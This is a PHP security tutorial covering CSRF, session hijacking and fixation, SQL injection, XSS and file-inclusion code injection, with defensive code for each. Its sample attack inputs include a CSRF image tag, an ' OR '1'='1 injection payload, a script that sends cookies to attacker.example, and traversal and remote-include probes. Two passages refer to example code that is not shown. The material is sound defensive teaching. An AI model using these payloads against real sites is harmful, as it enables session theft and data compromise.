
Top 6 Common PHP Security Issues And Their Solutions

In this article I'm going to tell you about the top 6 common security threats in PHP scripts. You may already be familiar with them; if not, this is a good time to read up on them and keep them in mind.

1. Cross Site Request Forgeries (CSRF)

CSRF refers to a request that looks as if it was initiated by one of the site's trusted users, but which that user did not make deliberately. There are many variations. One example, an image tag planted on another site, which makes the victim's browser issue the request with the victim's own cookies attached:

<img src='http://example.com/single_click_to_buy.php?user_id=123&item=12345'>

Preventing Cross Site Request Forgeries
In general, make sure that requests really come from your own forms, and that each form submission is matched to an individual form that you sent out. There are two rules to remember:
• Use sessions with appropriate security measures, e.g. regenerate the session ID and use SSL for every session.
• Generate a one-time token, embed it in the form, save it in the session (as a session variable), and check it on submission.
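The token scheme from the two rules above, written out as an added example (this is not code from the original article). The form field names, the item number and the use of PHP's file-based session store are assumptions for the illustration; the purchase itself is left as a comment.

```php
<?php
// Added example, not code from the original article: a one-time CSRF token
// stored in the session and checked on form submission. Field names and the
// item number are assumptions for the illustration.
declare(strict_types=1);

session_start();

// Generate a fresh token for each form render and remember it server-side.
function csrf_token(): string
{
    // 32 bytes from the CSPRNG, hex-encoded so it is safe to embed in HTML.
    $token = bin2hex(random_bytes(32));
    $_SESSION['csrf_token'] = $token;
    return $token;
}

// Verify the submitted token against the one in the session and discard it,
// so the same token cannot be replayed.
function csrf_check(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? null;
    unset($_SESSION['csrf_token']);              // one-time use
    if ($expected === null || $submitted === null) {
        return false;
    }
    // Constant-time comparison: no timing side channel on the token value.
    return hash_equals($expected, $submitted);
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    // State changes only via POST: a planted <img src="..."> can only send GET.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Identify the buyer from the session, never from a user_id in the request.
    $buyer = $_SESSION['user_id'] ?? null;
    // ... record the purchase of $_POST['item'] for $buyer here ...
    exit('Purchase accepted');
}

// GET: render the form with the token embedded as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form method="post" action="single_click_to_buy.php">
    <input type="hidden" name="csrf_token" value="<?= $token ?>">
    <input type="hidden" name="item" value="12345">
    <button type="submit">Buy</button>
</form>
```

Two points worth noticing: the comparison uses hash_equals() rather than ==, and the buyer comes from the session, so the user_id=123 parameter in the original example has nothing to attach to. Because the token is overwritten on every render, a user with the same form open in two tabs will have the older tab rejected; if that matters, keep one token per session for its lifetime instead of one per form.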

2. Session capturing and hijacking

It's the same idea as session fixation, but it involves stealing the session ID. If session IDs are stored in cookies, attackers can steal them through XSS and JavaScript. Session IDs can also be sniffed on the network, or obtained from proxy server logs if they are carried in the URL.

Preventing Session capturing and hijacking
• Regenerate IDs (at least on every login and privilege change)
• If using sessions, always use SSL, and mark the session cookie Secure and HttpOnly

3. SQL injection

SQL injection is a kind of attack in which malicious users enter SQL in form fields in a way that changes the execution of your SQL statements. A variation is command injection, where user data is passed through system() or exec(). It shares the same mechanism as SQL injection, but for shell commands.

In the code above, the user-supplied value ($_POST['user_name']) is not properly filtered or escaped on line 1. The query could fail, or even damage the database, if $user_name has the wrong format or contains substrings that turn your SQL statement into something else.

Preventing SQL injection

Options:
• Filter data using mysqli_real_escape_string() (the old mysql_ extension no longer exists in PHP 7; note that escaping only protects values that are enclosed in quotes in the query)
• Manually check that each piece of data is of the right type
• Use prepared statements and bind variables

Use prepared statements

• They separate data from SQL logic
• The prepared statement handles the quoting/escaping automatically
• Adopting them as a coding standard helps limit problems caused by new developers within your organization
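An added example (not code from the original article) of the injection described above and the prepared-statement fix that the list recommends. It uses an in-memory SQLite database through PDO so it runs offline; the users table, its two rows and the "' OR '1'='1" payload are constructed for the demonstration, and the pdo_sqlite extension is assumed to be available.

```php
<?php
// Added example, not code from the original article: the same lookup written
// with string concatenation and with a prepared statement. The table, rows
// and payload are constructed here; an in-memory SQLite database is assumed.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, user_name TEXT, password_hash TEXT)');
$db->exec("INSERT INTO users (user_name, password_hash) VALUES ('alice', 'h1'), ('bob', 'h2')");

// Vulnerable: user data is pasted into the SQL text, so it can change the
// structure of the statement, not just a value in it.
function find_user_vulnerable(PDO $db, string $userName): array
{
    $sql = "SELECT id, user_name FROM users WHERE user_name = '$userName'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Safe: the SQL is compiled first with a placeholder, then the value is
// bound as data only; the database never parses it as SQL.
function find_user_prepared(PDO $db, string $userName): array
{
    $stmt = $db->prepare('SELECT id, user_name FROM users WHERE user_name = ?');
    $stmt->execute([$userName]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A classic payload typed into the user-name field (constructed sample).
$payload = "' OR '1'='1";

// The concatenated query becomes ... WHERE user_name = '' OR '1'='1',
// whose WHERE clause is true for every row, so the whole table comes back.
$rows = find_user_vulnerable($db, $payload);
printf("vulnerable query returned %d row(s)\n", count($rows));

// The prepared statement looks for a user literally named ' OR '1'='1
// and finds nobody.
$rows = find_user_prepared($db, $payload);
printf("prepared statement returned %d row(s)\n", count($rows));
```

With mysqli the equivalent is prepare() followed by bind_param('s', $userName) and execute(). The same principle applies to the command-injection variant mentioned above: never interpolate user data into a system()/exec() string; pass each argument through escapeshellarg(), or better, avoid invoking a shell at all.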

4. XSS

XSS (Cross Site Scripting) is an attack in which a user submits data to your website that includes a client-side script (generally JavaScript). If you output this data to another web page without filtering it, the script is executed in the browser of whoever views that page.

Accept text comments from user

Outputting comments to (another) user:

What's going to happen?

• Annoying popups
• Refreshes or redirections
• Corrupted pages or forms
• Stolen cookies (and with them the session)
• Requests made in the victim's name via AJAX (XMLHttpRequest)

Preventing XSS

To prevent XSS attacks, properly filter all output to the browser, e.g. through htmlentities() or htmlspecialchars() in PHP, passing ENT_QUOTES and the page's character set. Basic usage of htmlentities() is simple, but there are many advanced controls, and the right escaping depends on where the data lands: HTML body, attribute, JavaScript or URL each need their own encoding.
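The comment scenario from this section, shown as an added example (not code from the original article): the same stored comment rendered raw and rendered through an escaping helper, plus a separate helper for the JavaScript context, where HTML escaping is not enough. The comment text is a constructed sample payload, and PHP 7.3 or later is assumed for JSON_THROW_ON_ERROR.

```php
<?php
// Added example, not code from the original article: rendering a user comment
// to another user, unescaped and escaped. The comment is a constructed sample.
declare(strict_types=1);

// Escape for an HTML body or attribute context. ENT_QUOTES also encodes single
// quotes (needed inside value='...'); ENT_SUBSTITUTE replaces invalid byte
// sequences instead of returning an empty string; the charset must match the
// page's declared encoding or multibyte tricks can slip through.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Escape for a value dropped into an inline <script> block: encode it as a JSON
// string literal and hex-encode the characters that could close the block.
function js(string $s): string
{
    return json_encode(
        $s,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// What an attacker might post as a "comment" (constructed sample): it ships the
// reader's cookies to a host the attacker controls.
$comment = "Nice post! <script>new Image().src='http://attacker.example/?c='+document.cookie</script>";

// Vulnerable: the raw comment goes into the page, so the script runs for every reader.
$unsafeHtml = "<p class=\"comment\">$comment</p>";

// Safe: the comment is rendered as text; the browser shows the tags literally.
$safeHtml = '<p class="comment">' . e($comment) . '</p>';

// Safe in a JavaScript context as well: <, >, ' and " become \u escapes, so the
// string cannot terminate the script block or the literal.
$safeJs = '<script>var lastComment = ' . js($comment) . ';</script>';

echo $unsafeHtml, "\n";
echo $safeHtml, "\n";
echo $safeJs, "\n";
```

Escape at output time, in the helper that writes to the page, rather than at input time: the same comment may later be emitted into an attribute, a script or a JSON API, and each needs a different encoding.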

5. Session fixation

Session security works on the assumption that a PHPSESSID is hard to guess. However, PHP can accept a session ID either through a cookie or through the URL, so an attacker can trick a victim into using a specific session ID that the attacker already knows (for example through a phishing link carrying ?PHPSESSID=...). Once the victim logs in under that ID, the attacker shares the authenticated session.
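Session hardening for both section 2 (capturing and hijacking) and this section (fixation), as one added example that is not code from the original article. The settings are applied with ini_set() so the code does not depend on the server's php.ini, in line with the general principles further down; they can equally be set in php.ini. The 15-minute rotation interval is a constructed value, and PHP 7.3 or later is assumed for the array form of session_set_cookie_params().

```php
<?php
// Added example, not code from the original article: session settings and
// helpers against hijacking and fixation. The rotation interval is a
// constructed value; PHP >= 7.3 is assumed.
declare(strict_types=1);

// Accept the session ID only from a cookie, never from the URL (?PHPSESSID=),
// and never rewrite links to carry it. This closes the fixation-by-link trick
// and keeps the ID out of proxy and server logs.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Refuse IDs the client made up: PHP issues a fresh one instead of adopting it.
ini_set('session.use_strict_mode', '1');

// Cookie flags: HttpOnly keeps document.cookie (XSS) from reading the ID,
// Secure keeps it off plaintext HTTP, SameSite=Lax blocks most cross-site sends.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);

session_start();

// Call on every privilege change (login, logout, role change): a new ID is
// issued and the old one deleted, so an ID planted or sniffed before login
// is worthless afterwards.
function login(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
    $_SESSION['created'] = time();
}

// Rotate the ID periodically within a session as well, so a captured ID has
// a short useful lifetime. Constructed default: 15 minutes.
function rotate_if_stale(int $maxAge = 900): void
{
    if (isset($_SESSION['created']) && time() - $_SESSION['created'] > $maxAge) {
        session_regenerate_id(true);
        $_SESSION['created'] = time();
    }
}

function logout(): void
{
    $_SESSION = [];
    // Expire the cookie on the client too, not only the server-side data.
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}
```

The Secure flag is what makes "always use SSL" stick: without it the browser will still send the cookie over any http:// link to the same host. session_regenerate_id(true) is the concrete form of "regenerate IDs"; the true argument deletes the old session file rather than leaving a copy the attacker's planted ID still points at.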

6. Code injection

Code injection is the exploitation of a bug that is caused by processing invalid data. The problem occurs when you accidentally execute arbitrary code, typically through file inclusion. Poorly written code can allow a remote file to be included and executed. Many PHP functions, such as require, can take either a URL or a filename. Example:

In the example above, passing user input as a filename, or as part of a filename, invites users to start the filename with "http://" (and, even when remote inclusion is disabled, to use "../" to reach local files outside the intended directory).

Prevent Code Injection

• Filter user input (best of all, select the file from a fixed list of names and never build a path from request data)
• Disable the allow_url_fopen and/or allow_url_include settings in php.ini. This disables require/include/fopen of remote files. Don't rely on this alone: local files, including ones a user uploaded, can still be included.
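An added example (not code from the original article) of the two prevention points: a page dispatcher that includes a file named by the request, first as it is typically and unsafely written, then restricted to an allow-list, plus a path check for cases where an allow-list is impractical. The pages/ directory, its single home.php file and the probe names are constructed in a temp directory so the script runs stand-alone.

```php
<?php
// Added example, not code from the original article: restricting which file a
// request-selected include may load. The pages/ directory, its contents and
// the probe names are constructed here for the demonstration.
declare(strict_types=1);

// Vulnerable: with allow_url_include=On, ?page=http://attacker.example/shell
// fetches and executes remote code; with it Off, ../../../etc/passwd or an
// uploaded file can still be pulled in.
function render_page_vulnerable(string $pagesDir, string $page): void
{
    require $pagesDir . '/' . $page . '.php';
}

// Safe, and preferred: a fixed allow-list. The user's string only selects a
// key; it never becomes part of a path, so URLs and "../" have no effect.
function render_page_safe(string $pagesDir, string $page): void
{
    $pages = ['home' => 'home.php'];
    if (!isset($pages[$page])) {
        http_response_code(404);
        exit('No such page');
    }
    require $pagesDir . '/' . $pages[$page];
}

// When an allow-list is impractical: restrict the name to a safe character
// set and check that the resolved path stays under the intended directory.
function resolve_under(string $baseDir, string $name): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        return null;                                 // no "/", "..", ":" etc.
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $name . '.php');
    if ($base === false || $full === false) {
        return null;                                 // missing file or directory
    }
    // realpath() resolves symlinks and "..", so a prefix check is reliable here.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// --- demonstration with a constructed pages/ directory ---
$pagesDir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($pagesDir);
file_put_contents($pagesDir . '/home.php', "<?php echo \"home page\\n\";");

foreach (['home', '../../../etc/passwd', 'http://attacker.example/shell'] as $name) {
    $path = resolve_under($pagesDir, $name);
    printf("%-32s -> %s\n", $name, $path === null ? 'rejected' : 'allowed');
}

render_page_safe($pagesDir, 'home');

unlink($pagesDir . '/home.php');
rmdir($pagesDir);
```

The character-class check does most of the work in resolve_under(); the realpath() prefix comparison is the backstop for symlinks inside the pages directory that point elsewhere. Both are secondary to the allow-list, which should be the default.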

Other general principles

• Don't rely on server configuration to protect you, especially if your web server/PHP is managed by your ISP, or if your web site might be migrated/deployed somewhere else in future. Embed the security-aware checking/logic in the website code itself (PHP, HTML, JavaScript, etc.)
• Design your server-side scripts with security from the ground up: e.g., use a single line of execution that begins with a single point of authentication and data cleaning. Delegate all login/security checking logic to one PHP function/file that is included in all security-sensitive pages, so that problems can be found and fixed in one place.
• Keep your code up to date. Stay on top of patches and advisories.

Hope it helps you, and please like my Facebook page:

and make me proud. By the way, if you face any problem, let me know in the comment section below.
